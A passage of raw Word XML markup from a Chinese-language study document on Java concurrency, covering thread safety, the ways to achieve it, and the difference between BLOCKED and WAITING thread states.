          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，否则的话就可能影响线程安全。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA20F8" w:rsidRPr="00F41A4C" w:rsidRDefault="00AA20F8" w:rsidP="00AA20F8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>共享数据的情况就是多个线程可以访问同一个变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA20F8" w:rsidRPr="00F41A4C" w:rsidRDefault="00AA20F8" w:rsidP="00AA20F8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(2) </w:t>
      </w:r>
      <w:r w:rsidRPr="009B6CDB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>非线程安全</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>主要是指多个线程对同一个对象中的</w:t>
      </w:r>
      <w:r w:rsidRPr="009B6CDB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>同一个实例变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>进行操作时会发生值被更改、值不同步的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA20F8" w:rsidRDefault="00AA20F8" w:rsidP="00AA20F8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r w:rsidR="00C33F40">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>线程安全获得的实例变量是经过同步处理的</w:t>
      </w:r>
      <w:r w:rsidR="00F26E3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C12489" w:rsidRPr="00F41A4C" w:rsidRDefault="00C12489" w:rsidP="00C12489">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>1.3.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>线程安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现方式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C12489" w:rsidRPr="00F81963" w:rsidRDefault="00C12489" w:rsidP="00C12489">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F81963">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00F81963">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">inal </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C12489" w:rsidRPr="00F81963" w:rsidRDefault="00C12489" w:rsidP="00C12489">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F81963">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C12489" w:rsidRPr="00F81963" w:rsidRDefault="00C12489" w:rsidP="00C12489">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F81963">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C12489" w:rsidRDefault="00C12489" w:rsidP="00C12489">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F81963">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ThreadLocal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C12489" w:rsidRDefault="00C12489" w:rsidP="00C12489">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lock</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C12489" w:rsidRDefault="00C12489" w:rsidP="00C12489">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Synchronized</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005947AC" w:rsidRPr="005947AC" w:rsidRDefault="004F0654" w:rsidP="005947AC">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:lastRenderedPageBreak/>
        <w:t>1.3.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>线程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Blocked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Wating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态有什么区别</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F0654" w:rsidRDefault="005947AC" w:rsidP="005947AC">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="357" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>BLOCKED(</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>等待获取锁时进入的状态</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程被挂起了，原因通常是因为它在等待一个锁，当某个</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正好有线程在使用时，一个线程尝试进入这个临界区，就会被阻塞，直到另一个线程走完临界区或发生了相应锁对象的</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wait</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作后，它才有机会去争夺进入临界区的权利。当抢到锁之后，才会从</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态恢复到</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态。这个状态它好像什么也不做一样</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>任意线程对</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Object(Object</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>由</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>保护</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>的访问，首先要获得</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>的监视器，如果获取失败，线程进入同步队列，线程状态变为</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Blocked</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005947AC" w:rsidRPr="005947AC" w:rsidRDefault="005947AC" w:rsidP="005947AC">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="357" w:firstLine="422"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>WAITING</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005947AC" w:rsidRPr="005947AC" w:rsidRDefault="005947AC" w:rsidP="007545EC">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程处于</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WAITING</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态的场景。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005947AC" w:rsidRPr="005947AC" w:rsidRDefault="005947AC" w:rsidP="007545EC">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Object</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wait</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，但没有指定超时值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005947AC" w:rsidRPr="005947AC" w:rsidRDefault="005947AC" w:rsidP="007545EC">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>join</w:t>
      </w:r>
      <w:r w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法，但没有指定超时值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005947AC" w:rsidRDefault="00804217" w:rsidP="007545EC">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005947AC" w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r w:rsidR="005947AC" w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LockSupport</w:t>
      </w:r>
      <w:r w:rsidR="005947AC" w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的</w:t>
      </w:r>
      <w:r w:rsidR="005947AC" w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>park</w:t>
      </w:r>
      <w:r w:rsidR="005947AC" w:rsidRPr="005947AC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002227C6" w:rsidRPr="002227C6" w:rsidRDefault="002227C6" w:rsidP="002227C6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="002227C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>locked</w:t>
      </w:r>
      <w:r w:rsidRPr="002227C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="002227C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>aiting</w:t>
      </w:r>
      <w:r w:rsidRPr="002227C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态的</w:t>
      </w:r>
      <w:r w:rsidRPr="002227C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
      <w:r w:rsidRPr="002227C6">
        <w:rPr>
